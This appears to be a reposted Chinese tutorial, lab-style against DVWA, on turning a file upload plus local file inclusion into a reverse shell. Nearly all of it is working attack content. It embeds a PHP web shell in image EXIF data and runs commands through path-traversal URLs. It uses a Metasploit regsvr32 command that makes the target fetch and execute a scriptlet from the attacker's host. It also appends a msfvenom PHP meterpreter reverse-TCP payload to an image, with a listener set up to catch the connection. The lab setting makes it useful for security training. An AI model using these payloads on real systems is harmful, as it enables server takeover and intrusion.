在本文中,您将了解如何通过 FILE INCLUSION 漏洞绕过高安全性中的文件上传漏洞。以及如何绕过本地文件包含以获取受害者 PC 的反向连接。
攻击者:kali Linux
目标:Dvwa
首先,您需要从此处下载Exif Pilot工具。这是一个适用于 Windows 用户的 GUI 工具,允许在 JPEG、PNG 和 GIF 图像中添加 exif 数据和元数据。
现在打开 exif pilot并插入任意图像来隐藏其中的恶意评论;从截图中,你可以看到我选择了shell.png图像,然后单击EDIT EXIF/IPTC。
system($_GET['c']);
现在在浏览器中探索目标 IP,并使用admin: password作为凭据登录 DVWA 。将安全级别设置为高。
为了执行恶意代码,我们需要更改漏洞类别以及安全级别,以便我们可以执行图像内的隐藏注释。
现在将安全级别设置为低。
为了绕过DVWA高安全性中的文件上传漏洞,我们需要设置其他漏洞,为此我选择了文件包含。
文件包含允许用户通过 URL 执行任何文件,正如我上面所描述的。
http://192.168.1.102/dvwa/vulnerability/fi/?page=../../hackable/uploads/shell.png
http://192.168.1.102/dvwa/vulnerability/fi/?page=../../hackable/uploads/shell.png&c=ifconfig
http://192.168.1.102/dvwa/vulnerability/fi/?page=../../hackable/uploads/shell.png&c=dir
接下来我将尝试使用 Kali Linux 实现 meterpreter 会话
输入msfconsole并加载 metasploit 框架。
use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103
msf exploit(regsvr32_applocker_bypass_server) > set lport 1234
msf exploit(regsvr32_applocker_bypass_server) > exploit
http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll
meterpreter sessions 1
meterpreter>sysinfo
第二种方式
在第二部分中,我们将尝试将恶意 PHP 文件与图像结合起来,进一步使用该恶意图像上传到 Web 应用程序服务器,然后以与上述相同的方式绕过该图像。
首先,您需要下载任意.png/.jpg/.gif 图像并将其保存在桌面上。在 Kali Linux 中,我下载了一张图片并将其保存在桌面上,名称为“a.png” 。现在打开终端并输入以下命令在“a.png”图像中生成PHP 代码。
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png
cat /root/Desktop/a.png
现在重复上述过程,在 DVWA 中以高安全级别上传文件。从给出的屏幕截图中,您可以看到我的“ a.png ”图像已成功上传到 Web 服务器中。
复制图像上传的突出显示的路径。
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) >exploit
http://192.168.1.102/dvwa/vulnerability/fi/?page=../../hackable/uploads/a.png
原文始发于微信公众号(三沐数安):利用 LFI 和文件上传进行 Web 服务器攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论